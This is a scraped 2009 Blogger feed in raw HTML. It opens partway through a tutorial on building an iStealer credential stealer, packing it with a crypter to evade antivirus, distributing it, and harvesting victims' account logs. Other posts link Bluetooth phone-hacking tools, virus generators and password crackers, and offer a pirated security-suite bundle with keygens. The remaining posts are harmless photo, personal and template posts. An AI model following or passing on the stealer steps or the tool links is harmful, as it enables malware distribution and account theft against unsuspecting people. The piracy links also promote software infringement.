style="font-weight: normal;"><span class="Apple-style-span" style=""><span class="Apple-style-span" style="color: rgb(255, 255, 204);font-size:12;" ><span class="Apple-style-span" style="color: rgb(0, 0, 0);">Step 7:<br />Click the "Crypter" link above and download it to your desktop. Extract it as you previously did with the iStealer. Open the crypter which in this case is BRM Crypt as it is the least detected public one available. First click Add and select the .exe you previously built with the iStealer, you will then be prompted to "Encrypt this file?" click yes.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihxtlSpdyDU2E67hxQEfDiy2J8F-2av2H3FGtfOsGqBYx_8MeyhOVr6M39HzdGh2EX5c2td8uk1h1lRcRBsKHa0jNddTy-2TOYfzd6S5iFVdw6txIP3QzdyYOcnjInv1QlIZNFK9LE/s1600-h/82725958.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 316px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihxtlSpdyDU2E67hxQEfDiy2J8F-2av2H3FGtfOsGqBYx_8MeyhOVr6M39HzdGh2EX5c2td8uk1h1lRcRBsKHa0jNddTy-2TOYfzd6S5iFVdw6txIP3QzdyYOcnjInv1QlIZNFK9LE/s320/82725958.png" alt="" id="BLOGGER_PHOTO_ID_5394223733306939186" border="0" /></a></span></span></span></span></span></span></span><span style="font-weight: bold;"><span class="Apple-style-span" style="font-family: Verdana,Tahoma,Arial,'Trebuchet MS',sans-serif,Georgia,Courier,'Times New Roman',serif;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style=""><span class="Apple-style-span" style="color: rgb(255, 255, 204); font-size: 12px;"><span class="Apple-style-span" style="color: rgb(0, 0, 0);">Step 8:<br />Ignore all of the steps about file cloning and icon changing, however if you want you can choose to use an error message. Finally, navigate to the "More Settings" tab and press the "Build" button. This will be your final .exe so feel free to name it whatever you want and save it to a place you find fit.<br /><br />Step 9:<br />You are now done! All that is left is to distribute the Crypted .exe you made. As this tutorial is for educational purposes only I cannot tell you that you can get a shit load of Rapidshare accounts using this method, so up yours crackers.<br /><br />Step 10:<br />Once people have downloaded your crypted stealer, you want to check the logs for any accounts. All you have to do is go to <a href="http://www.drivehq.com/file/ShowFolderFrame.aspx">http://www.drivehq.com/file/ShowFolderFrame.aspx</a><span>? and login. There should be a list of the computers you have infected, the file name will be something like "AdminPC-22832323" which is the name of the PC followed by some <span style="text-decoration: underline; color: rgb(0, 153, 0); font-size: 12px; font-weight: 400; font-style: normal; font-family: Verdana,Tahoma,Arial,'Trebuchet MS',sans-serif,Georgia,Courier,'Times New Roman',serif;" class="IL_LINK_STYLE">random number</span>. What you need to do now is click on the file and inside will be a list of accounts for you to enjoy!!<br /><br /></span></span></span></span></span></span></span></span>pinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.com0tag:blogger.com,1999:blog-3481169222727896325.post-57825367828007784172009-10-06T22:23:00.000-07:002009-10-06T22:41:33.826-07:00MY GOLDEN RULE<div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFBVuu5SHSGFuATQtpSsgNO78dtk-hRbih_bjii4lcRvHDTk_GEp_Nm1YfuykSXuCwNWZqT8jTFlQVffxGVTqw_DWzCVJY-UZpgnxKKR4xVwJEWU-1uDUwzoPs5mz49WO3C_EMQqCx/s1600-h/2_473160713l.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 240px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFBVuu5SHSGFuATQtpSsgNO78dtk-hRbih_bjii4lcRvHDTk_GEp_Nm1YfuykSXuCwNWZqT8jTFlQVffxGVTqw_DWzCVJY-UZpgnxKKR4xVwJEWU-1uDUwzoPs5mz49WO3C_EMQqCx/s320/2_473160713l.jpg" alt="" id="BLOGGER_PHOTO_ID_5389726303509897410" border="0" /></a><span style="font-weight: bold;">"DO NOT ASSUME UNLESS OTHERWISE SPECIFIED"</span><br /><br />THIS IS A PHOTO BLOG TAKEN AT ELIZABETH RESORT..<br /><br />YOU CAN SEE THE THREE INDIVIDUALS POSING AT THEIR BEST NOT<br />NOTICING SOMEONE SNEAKING AT THEIR BACK..<br />YEAH.. THAT MAN SURE WAS HAPPY..<br /><div style="text-align: center;"><br />TO RELATE THIS PHOTO WITH MY GOLDEN RULE:<br />DO NOT ASSUME THAT EVERY SHOT OF THE CAMERA IS GOOD..<br />SOMETIMES THERE WILL COME AN INSTANCE WHEREIN<br />THAT GOOD SHOT YOU ASSUMED WAS THE WORST SHOT YOU GET..<br />THE EFFORT YOU EXERTED BECOMES USELESS..<br />THE THOUGHT YOU HAVE IN MIND DURING THAT SHOT BECAME<br />A TRASH YOU JUST THREW AFTER YOU SAW THE OUTPUT..<br />AND THE TIME YOU SPENT PREPARING FOR THAT SHOT BECAME A<br />WASTE YOU CAN NO LONGER BROUGHT BACK BECAUSE EVERY SECONDS OF THE<br />TIME IS ANOTHER TIME...<br /></div></div><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjryCFOucczREIQYcGDyQLVOzCzO4OIYg7vNZcZRvP0AvU-kBz9SXVZ6cufpfbP_lZWDHXvsnyohg3t41J9IxI7WEbR6bREBFn4y5tLy4wZEsblana9CgcDikZNbVNztee-wGHpBqbj/s1600-h/2_473160713l.jpg"><br /></a>pinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.com0tag:blogger.com,1999:blog-3481169222727896325.post-83471161056563399532009-10-06T04:49:00.000-07:002009-10-06T04:52:37.544-07:00Swishmax3 Build Date 2009.09.04<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifsljwseR7oBBWn_zdsHcXnbb2nAVsF5CWnoYhdCIfzjyGEF7KwToEfVabN6_zt0HNF3BQ9I3cNAA37XNnfapA5yn3YKK6JzEcgnkWmVqkLKVGGFDIqPb5PzopKGaSmeRQubPsx305/s1600-h/168ty74.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 292px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifsljwseR7oBBWn_zdsHcXnbb2nAVsF5CWnoYhdCIfzjyGEF7KwToEfVabN6_zt0HNF3BQ9I3cNAA37XNnfapA5yn3YKK6JzEcgnkWmVqkLKVGGFDIqPb5PzopKGaSmeRQubPsx305/s320/168ty74.jpg" alt="" id="BLOGGER_PHOTO_ID_5389453191886492866" border="0" /></a><br /><b><span style="color:#ff0000;">Advanced Flash creation tool</span></b> for the graphic artist or web professional. Advanced drawing tools, scripting, Flash video - everything you need for a dynamic Flash animation. New in SWiSH Max3: Project Templates, Knife tool, and much more!<br /><br /><b><span style="color:#ff0000;">SWiSH Max3 - The Ultimate Flash Creation Tool</span></b><br /><br />Advanced Flash Creation Tool For The Graphic Artist Or Web Professional<br />Creates Stunning Flash Animations and Websites with Ease<br />Includes over 350 Preset Multimedia Effects<br />Includes over 180 Ready-to-use Components and Vector Shapes<br />Import Images, Graphics, Sound and Video from all popular formats<br />Export Presentations to Flash, Video, EXE, GIF Animation or Image Sequence<br />Powerful Scripting Language for Advanced Users<br />Tools to Control Motion, Draw Shapes, Edit Text, and more<br />NEW! Project templates - Instant Results Using the Wizard Panel<br />NEW! Drawing Tools - Shape Operations, Knife Tool, Component Tool<br />NEW! Improved Motion Path - Editable Bezier Curves, Convert a Shape to Path.<br /><br /><b><span style="color:#ff0000;">Features</span></b><br />With SWiSH Max3 you can create Flash movies quickly and easily. SWiSH Max3 is packed with features that lets you make stunning interactive Flash animations. Here are some of the features that make SWiSH Max3 so powerful:<br /><br /><br />Download here:<br /><br /><pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 440px; height: 34px; text-align: left;">http://www.mediafire.com/?jmlmymmmmgm</pre>pinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.com0tag:blogger.com,1999:blog-3481169222727896325.post-73136325633496602162009-10-04T22:29:00.000-07:002009-10-04T22:32:28.096-07:00PARA SA IROG KO<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i33.tinypic.com/2i9k0nr.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 500px; height: 730px;" src="http://i33.tinypic.com/2i9k0nr.jpg" alt="" border="0" /></a><br />Our heart beats together in HArmony...<br /><br />Our feelings shared is hard to find these days...<br /><br />I'm glad we FOund each other just in time...<br /><br /><br />ILOVEYOU...pinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.com0tag:blogger.com,1999:blog-3481169222727896325.post-74613356207669009562009-10-04T21:51:00.000-07:002009-10-04T21:56:20.774-07:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0E2knVmuZpu3e-L9Xe-9SEPgAgCT-g1i0pYDP3u80YUwi44AYmctUiO7uoXB-AJkJzLHmxUUe6bdxedXr0GJ_uT-KPo9DStAotaEQLSAuFuzoLMxo8P0uBaXlIwGy7coNpcCCK1bFYgg/s320/Mobile+BlueTooth+Hacking+and+Extras.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 177px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0E2knVmuZpu3e-L9Xe-9SEPgAgCT-g1i0pYDP3u80YUwi44AYmctUiO7uoXB-AJkJzLHmxUUe6bdxedXr0GJ_uT-KPo9DStAotaEQLSAuFuzoLMxo8P0uBaXlIwGy7coNpcCCK1bFYgg/s320/Mobile+BlueTooth+Hacking+and+Extras.jpg" alt="" border="0" /></a><br />Hack the bluetooth with this awesome package:<br /><br />including:<br /><br /><span><span style="text-decoration: underline; color: rgb(0, 153, 0); font-size: 12px; font-weight: 400; font-style: normal; font-family: Arial,Helvetica,Sans-Serif;" class="IL_LINK_STYLE">Super Bluetooth</span> Hack</span><br /><br />Once connected to a another phone via bluetooth you can:<br />- read his messages<br />- read his contacts<br />- change profile<br />- play his ringtone even if phone is on silent<br />- play his songs(in his phone)<br />- restart the phone<br />- switch off the phone<br />- restore factory settings<br />- change ringing volume<br />- And here comes the best<br />"Call from his phone" it includes all call functions like hold etc.<br /><span><span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Super Bluetooth</span> Hack for S60 2nd-3rd devices.</span><br /><br /><br />Works very well on sony ericsson phones[TESTED]<br /><br />Plus some handy extra's!!!!<br /><br /><br /><span style="font-weight: bold;">Download:</span><br /><br />Rapidshare:<br /><br />Code:<br />http://rapidshare.com/files/111404631/Mobile_BlueTooth_Hacking_and_Extras__AIO_.rar<br /><br /><br />HotFile:<br /><br />Code:<br />http://hotfile.com/dl/8708546/765ae48/Mobile_BlueTooth_Hacking_and_Extras__AIO_.rar.htmlpinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.com0tag:blogger.com,1999:blog-3481169222727896325.post-77392770101950127652009-10-03T18:33:00.000-07:002009-10-03T18:38:03.268-07:00Best of 2009(Security Suites)<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlbl_FFQMJror-cgMyoOrQ3CbEJBTuPzkDGNQpepto5b7ZVLxT7ZjEHBTWqPg4hbOe3fpybcttKSrcEqoWVTPl0YQkxJz1wezfbES85Ad1AxjdsEO83rmuxgFV9D9Dblt_0HJHnj-rtXx5/s320/Best+of+2008+%28Security+Suites%29.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 226px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlbl_FFQMJror-cgMyoOrQ3CbEJBTuPzkDGNQpepto5b7ZVLxT7ZjEHBTWqPg4hbOe3fpybcttKSrcEqoWVTPl0YQkxJz1wezfbES85Ad1AxjdsEO83rmuxgFV9D9Dblt_0HJHnj-rtXx5/s320/Best+of+2008+%28Security+Suites%29.jpg" alt="" border="0" /></a><br /><span style="font-weight: bold;">Best of 2009 (Security Suites) </span><br /><br />Best Security Suites of 2008 as on (PC Magazine Vol.19 #4 Pag.78)<br /><br /><br />This is the last AIO By DArkor & nLa dEviLz<br />Its in .ISO Format burn to DVD with any burning utility..<br />Size 892 MB<br />divided into 10 RAR Files (95.7MB & one of 2.32MB)<br /><br />It includes:<br /><br />1. BitDefender Total Security 2008<br />2. Bullguard Internet Security 8.0<br /><span>3. CA <span style="text-decoration: underline; color: rgb(0, 153, 0); font-size: 12px; font-weight: 400; font-style: normal; font-family: 'Verdana';" class="IL_LINK_STYLE">Internet Security Suite</span> Plus 2008</span><br />4. ESET Smart Security<br />5. F-Secure Internet Security 2008<br />6. Kaspersky Internet Security 7.0<br />7. McAfee Total Protection (Retail) No Serial/key needed<br />8. Norton 360 2.0<br /><span>9. <span style="text-decoration: underline; color: rgb(0, 153, 0); font-size: 12px; font-weight: 400; font-style: normal; font-family: 'Verdana';" class="IL_LINK_STYLE">Norton Internet Security 2008</span></span><br />10. Outpost Security Suite Pro 2008<br /><span>11. <span style="text-decoration: underline; color: rgb(0, 153, 0); font-size: 12px; font-weight: 400; font-style: normal; font-family: 'Verdana';" class="IL_LINK_STYLE">Panda Internet Security 2008</span></span><br /><span>12. <span style="text-decoration: underline; color: rgb(0, 153, 0); font-size: 12px; font-weight: 400; font-style: normal; font-family: 'Verdana';" class="IL_LINK_STYLE">Trend Micro Internet Security</span> Pro 2008</span><br />13. Winows Live OneCare 2.5<br />14. ZoneAlarm Internet Security 7<br /><br /><br />(Serials/Keygens/Patches/installation instruccions included)<br /><br />Also Everest Ultimate Edition Included as Bonus no need to install<br />it runs from the CD/DVD Directly<br /><br />Enjoy!!<br /><br />By Darkor from FireAnt Co. & nLa dEviLz (AIO Maker)<br /><br /><span style="font-weight: bold;">Download Code:</span><br />http://rapidshare.com/files/170995434/Best_of_2008_nLa_dEviLz___FireAnt_Co.<br />part01.rar<br />http://rapidshare.com/files/171001050/Best_of_2008_nLa_dEviLz___FireAnt_Co.<br />part02.rar<br />http://rapidshare.com/files/171289687/Best_of_2008_nLa_dEviLz___FireAnt_Co.<br />part03.rar<br />http://rapidshare.com/files/171306301/Best_of_2008_nLa_dEviLz___FireAnt_Co.<br />part04.rar<br />http://rapidshare.com/files/171315776/Best_of_2008_nLa_dEviLz___FireAnt_Co.<br />part05.rar<br />http://rapidshare.com/files/171322094/Best_of_2008_nLa_dEviLz___FireAnt_Co.<br />part06.rar<br />http://rapidshare.com/files/171330109/Best_of_2008_nLa_dEviLz___FireAnt_Co.<br />part07.rar<br />http://rapidshare.com/files/171335977/Best_of_2008_nLa_dEviLz___FireAnt_Co.<br />part08.rar<br />http://rapidshare.com/files/171363404/Best_of_2008_nLa_dEviLz___FireAnt_Co.<br />part09.rar<br />http://rapidshare.com/files/171365979/Best_of_2008_nLa_dEviLz___FireAnt_Co.<br />part10.rar<br /><br /><br />password Code:<br />www.nd-warez.infopinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.com0tag:blogger.com,1999:blog-3481169222727896325.post-43882621837593568452009-10-03T18:31:00.000-07:002009-10-03T18:33:40.653-07:00Essential Portfolio Flash Website<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJ915XssgeqAXs6_BDFoDeQOcjkdu44ymF1iBN08YGumbPxdVFnMsOMAEDtr_7vzYlo4MI_xgTE7lK3IC8FlTsx28ck6-_RY_PVEi8Hoqt9PvR6Lgk4BYsKl-DnAhD94L7vXChi0Tkpp8/s320/Essential+Portfolio+Flash+Website.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 164px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJ915XssgeqAXs6_BDFoDeQOcjkdu44ymF1iBN08YGumbPxdVFnMsOMAEDtr_7vzYlo4MI_xgTE7lK3IC8FlTsx28ck6-_RY_PVEi8Hoqt9PvR6Lgk4BYsKl-DnAhD94L7vXChi0Tkpp8/s320/Essential+Portfolio+Flash+Website.jpg" alt="" border="0" /></a><br /><span><span><span class="IL_SPAN">Essential</span> </span><span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Portfolio</span><span> <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Flash Website</span> | 16.52 MB</span></span><br /><br /><span><span><span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Essential</span> </span><span style="text-decoration: underline; color: rgb(0, 153, 0); font-size: 12px; font-weight: 400; font-style: normal; font-family: Arial,Helvetica,Sans-Serif;" class="IL_LINK_STYLE">Portfolio</span><span> is an <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">essential</span> but complete </span><span class="IL_SPAN"><input name="IL_MARKER" type="hidden">portfolio</span>. Very easy to customize this <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">portfolio</span> is the perfect solution for showing your works and videos. Few steps and your professional and unique <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">portfolio</span> will be on line. Seven modules will help you to adapt the <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">portfolio</span> to your needs</span><br /><br />Simple page SImple_age is the simplest module, it can be easily changed by modifying the graphic texts and photos directly with flash instruments.<br /><br />List This module has an XML generated list. It can be used to list clients, works, partners and links…<br /><span><span style="text-decoration: underline; color: rgb(0, 153, 0); font-size: 12px; font-weight: 400; font-style: normal; font-family: Arial,Helvetica,Sans-Serif;" class="IL_LINK_STYLE">Video Module</span> This module has a big <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Video Module</span><span>, perfectly integrated in the project. It has been conceived as the perfect page to display a video reel, a <span style="text-decoration: underline; color: rgb(0, 153, 0); font-size: 12px; font-weight: 400; font-style: normal; font-family: Arial,Helvetica,Sans-Serif;" class="IL_LINK_STYLE">presentation video</span>, a demostration video…</span></span><br />XML multivideo page Through this module you can present a large amount of videos. The video list is XML generated.<br /><br />Gallery is the module with the classic gallery made of thumbnails and big images, completely xml driven. It can display horizontal and vertical images or swf.<br />Multigallery A great gallery with subgalleries, title, date, description, link.<br /><span><span style="text-decoration: underline; color: rgb(0, 153, 0); font-size: 12px; font-weight: 400; font-style: normal; font-family: Arial,Helvetica,Sans-Serif;" class="IL_LINK_STYLE">Contact Form</span> Page A Contact Page with php with thanks mail</span><br /><span>HOW IT WORKS The <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Portfolio</span><span> is easy to customize with his xml structure. The menu is dynamically generated. The structure of the template can be customized according to your needs. You can change, add or remove items in the menu simply opening with a text editor the file home.xml . Through the home.xml you can set also the alignments, the colors, the columns and rows of your menu. The <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Essential</span> </span><span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Portfolio</span><span> is conceived to be an <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">essential</span> solution to organize a </span><span class="IL_SPAN"><input name="IL_MARKER" type="hidden">portfolio</span> in few steps.</span><br /><span><span>RANDOM INTRO One of the original features of the <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Essential</span> </span><span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Portfolio</span> is that you can decide to load random Home page. Through the main xml you can decide how many home page you want to randomly load. Detailed instructions in the package.</span><br /><br />SOME OTHER FEATURES<br /><br />* Wide screen fit<br />* Navigation fully configurable<br />* Dynamic Menu<br />* Dynamic XML driven projects and galleries<br />* External Links in the main menu<br />* Fullscreen Button<br />* Galleries with sliding movement to show big images<br />* Random Home Page<br />* Background Music<br /><span>* <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Contact form</span> with php with thanks mail</span><br />* Html and detailed help file<br /><br />* ActionScript 2<br />* Flash CS3<br /><br /><span style="font-weight: bold;">Download Code:</span><br />http://uploading.com/files/TPQMZZXY/EssentialPortfolio.rar.htmlpinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.com0tag:blogger.com,1999:blog-3481169222727896325.post-76313422422507884872009-10-03T18:25:00.000-07:002009-10-03T18:29:52.376-07:00Blogger Adsense Guide<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgifdNUFWc6BD2fZl-N4t5cGOMw1Oc6nUQcoO-BTOU_VzlK5YEU56vJCElTwqhU4rQqF-zvUrsG7s9bYcr911n2uyUXQQCn-u41YPsRusp8EbQ7o8otQ-ZiSE-q06wfGkUk08P_lY6b2lPu/s320/Blogger+Adsense+Guide.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 181px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgifdNUFWc6BD2fZl-N4t5cGOMw1Oc6nUQcoO-BTOU_VzlK5YEU56vJCElTwqhU4rQqF-zvUrsG7s9bYcr911n2uyUXQQCn-u41YPsRusp8EbQ7o8otQ-ZiSE-q06wfGkUk08P_lY6b2lPu/s320/Blogger+Adsense+Guide.jpg" alt="" border="0" /></a><br /><span style="font-weight: bold;">Blogger Adsense Guide</span><br /><br /><span>• <span style="text-decoration: underline; color: rgb(0, 153, 0); font-size: 13px; font-weight: 400; font-style: normal; font-family: "Trebuchet MS",Arial,Helvetica,sans-serif;" class="IL_LINK_STYLE">The Future</span> Of Blogs & Why You Need To Act Now - You're going to discover where <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">the future</span> of blogs is headed, why you need to act now and how you are actually doing yourself a big favor even if you throw up a ugly blog!</span><br />* Setup Like A Breezy Afternoon - I realize that you don't want to learn complicated software, site programming or any of that other confusing stuff so you don't have to! You can get setup in a breezy afternoon while relaxing!<br /><span>* Adsense - What Is it? - Here you will learn just what Adsense is and why it's absolutely essential in your plan to profit. You'll learn why it's so easy <span style="text-decoration: underline; color: rgb(0, 153, 0); font-size: 13px; font-weight: 400; font-style: normal; font-family: "Trebuchet MS",Arial,Helvetica,sans-serif;" class="IL_LINK_STYLE">to make money</span> with and how you can profit with it.</span><br />* How To Entice The Click - You're going to learn how you can entice every person who ends up on your new blog to click links all over your blog earning you income. You'll learn secrets to inviting the click that work like wildfire!<br />* Easy Blog Writing - Here you will learn how you can easily write blog content that your visitors love and generates repeat traffic which, in turn, results in repeat clicks and more income for you!<br />* Free Services To Use! - You'll learn how you can get setup free. When I say free, I mean absolutely, 100% free!<br />* The Ultimate Upgrade - In this advanced section you will learn how you can take your blog that you have built up to a profit and give it the major overhaul it needs to generate even more money faster!<br /><br /><br /><span style="font-weight: bold;">Download Code:</span><br />http://uploading.com/files/2RULW2J9/BloggerAdsenseGuide.rar.htmlpinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.com0tag:blogger.com,1999:blog-3481169222727896325.post-3152110673059397042009-10-03T18:17:00.000-07:002009-10-03T18:23:34.599-07:00FLASH XML EDITOR VERSION 2<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEBumQal4zx91OWZxi6xRVT_ceTF_G9KhJ1fP113xSKKgzER8DEWOfxclyDWy3UgZzTtIyrJVk85qV50jlhorX8npPS4B8y-kV_noPuSHMfs1FIn1hdol5Yktvrxkgfyd1tWxT37uFjHY/s320/FLASH+XML+EDITOR+VERSION+2.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 300px; height: 200px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEBumQal4zx91OWZxi6xRVT_ceTF_G9KhJ1fP113xSKKgzER8DEWOfxclyDWy3UgZzTtIyrJVk85qV50jlhorX8npPS4B8y-kV_noPuSHMfs1FIn1hdol5Yktvrxkgfyd1tWxT37uFjHY/s320/FLASH+XML+EDITOR+VERSION+2.jpg" alt="" border="0" /></a><br /><span><span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Arial,Helvetica,Sans-Serif;font-size:12px;" class="IL_LINK_STYLE" >New Features</span> in Version 2</span><br /><br />- Add and Edit Unlimited XML Files<br />- Admin and user level login<br />- Fully configurable tabbed menu<br />- Upload and Download XML files<br /><span>- Batch <span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Arial,Helvetica,Sans-Serif;font-size:12px;" class="IL_LINK_STYLE" >file uploading</span></span><br /><span>- Create new XML files <span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Arial,Helvetica,Sans-Serif;font-size:12px;" class="IL_LINK_STYLE" >from scratch</span></span><br />- Automatic recognition of node data<br />- Image resizing and cropping<br /><span>- <span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Arial,Helvetica,Sans-Serif;font-size:12px;" class="IL_LINK_STYLE" >WYSIWYG HTML Editor</span></span><br />- MP3 support<br /><span>- MD5 <span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Arial,Helvetica,Sans-Serif;font-size:12px;" class="IL_LINK_STYLE" >password security</span></span><br />- Module-based interface structure<br />- Visual attribute editing<br />- XML formatting is retained<br />- CDATA tags are automatically recognized and maintained<br />- Can edit AS2 or AS3 websites<br />- and more…<br /><br />WATCH DEMO HERE:<br /><br />Code:<br /><br />http://www.flashxmleditor.com/demo/<br /><br /><br /><span style="font-weight: bold;"><span><span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: bold; font-style: normal;font-family:Arial,Helvetica,Sans-Serif;font-size:12px;" class="IL_LINK_STYLE" >DOWNLOAD FILE</span> HERE:</span></span><br />Code:<br />http://uploading.com/files/IJ7EY2DZ/fxmlebysgfx.rar.html<br />http://hotfile.com/links/8264122/c0c6551/fxmlebysgfx.rar<br />http://depositfiles.com/files/s30sjjal7pinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.com1tag:blogger.com,1999:blog-3481169222727896325.post-22154145126119158842009-09-30T21:02:00.003-07:002009-10-03T18:24:00.629-07:00Best Tools EVER<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8fHztJ1YPK5SyGeVFtcoZkpAilXze36mSxqMBmk-UmHqsK-Btb0Ga8xrifLkAxE0bM4PmNXvpebnK3ACSzxN4Jq5nK0mLxxmgsKSWO8vbGXnRPMpJ4YXuLc9rxC4tQcBmWP4jdCWq/s1600-h/hack.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 146px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8fHztJ1YPK5SyGeVFtcoZkpAilXze36mSxqMBmk-UmHqsK-Btb0Ga8xrifLkAxE0bM4PmNXvpebnK3ACSzxN4Jq5nK0mLxxmgsKSWO8vbGXnRPMpJ4YXuLc9rxC4tQcBmWP4jdCWq/s320/hack.jpg" alt="" id="BLOGGER_PHOTO_ID_5387792818214599058" border="0" /></a><span style="color: rgb(0, 0, 0);">Open VPN<br /><span>OpenVPN is a full-featured SSL VPN solution which can accomodate a wide range of configurations, including remote access, site-to-site VPNs, WiFi security, and enterprise-scale <span style="text-decoration: underline; color: rgb(0, 153, 0); font-weight: 400; font-style: normal;font-family:Verdana,Arial,sans-serif;font-size:11px;" class="IL_LINK_STYLE" >remote access solutions</span> with load balancing, failover, and fine-grained access-controls. GUI-version for Windows!</span><br /><a href="http://uploading.com/files/GTWU6PHX/open...l.zip.html" target="_blank">http://uploading.com/files/GTWU6PHX/open...l.zip.html</a><br /><br /><br />BlueFTP<br />This is an old tool which will helps you to hack mobiles throw bluetooth. Try it by yourself.<br /><a href="http://uploading.com/files/KTR3ONRF/BlueFTP.zip.html" target="_blank">http://uploading.com/files/KTR3ONRF/BlueFTP.zip.html</a><br /><br /><br />DELmE's Batch Virus Generator v1.0<br />This tool is a virus creater. It will create very proffesional virus. Never test any virus on your PC. Very effective for bad hackers. All credits go to DELmE<br /><a href="http://uploading.com/files/CS02T8P6/DELm...1.rar.html" target="_blank">http://uploading.com/files/CS02T8P6/DELm...1.rar.html</a><br /><br /><br />DELmE's Batch Virus Generator v2.0<br />This tool is a virus creater. It will create very proffesional virus. I would say it is best virus creater i have ever saw. Never test any virus on your PC. Very effective for bad hackers. All credits go to DELmE<br /><a href="http://uploading.com/files/0BPU0ZCP/DELm...0.rar.html" target="_blank">http://uploading.com/files/0BPU0ZCP/DELm...0.rar.html</a><br /><br /><br />Windows command list<br />This is a list for most of the windows operator commands. It can very useful for virus programmers.<br /><a href="http://uploading.com/files/SG3CU3V8/wind...t.rar.html" target="_blank">http://uploading.com/files/SG3CU3V8/wind...t.rar.html</a><br /><br /><br />THC-Hydra 5.4<br />This tool is a really good one to hack websites.This tool supports: TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, LDAP2 and Cisco AAA. It is worth to try it.<br /><a href="http://uploading.com/files/WWZGWNJG/hydr...n.zip.html" target="_blank">http://uploading.com/files/WWZGWNJG/hydr...n.zip.html</a><br /><br /><br />John the ripper<br />This tool is should crack password<br /><a 